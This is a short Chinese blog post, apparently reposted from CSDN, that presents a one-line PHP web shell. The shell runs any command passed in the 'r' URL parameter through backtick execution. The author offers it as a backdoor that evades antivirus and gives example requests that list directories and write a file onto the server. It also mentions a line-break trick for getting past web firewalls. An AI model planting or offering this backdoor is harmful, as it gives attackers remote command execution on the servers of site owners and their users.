各位同学 对 一句话木马 我写了第5篇了,没有绝对的安全 我们在完善中!啊哈哈
这段代码 可以被利用做后门 暂时免杀。
代码:
<?php //t.php $test = $_GET['r']; echo `$test`; ?> 大家看看这个代码有木有问题?我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了,而且又不 是单引号,这个就是关键所在了,这个符号是 Esc 下面的一个键 感叹号!旁边的,通过 echo 系统命令; 可以达到 system(); 一样的效果 如果不信的朋友可以测试
http://127.0.0.1/t.php?r=dir 可以列出目录
http://127.0.0.1/t.php?r=echo 我是马儿 >>D:web91ri.org .php
另外一个过常见web防火墙的一句话《将代码换行绕过web保护系统》
文章来源: https://blog.csdn.net/kclax/article/details/92118079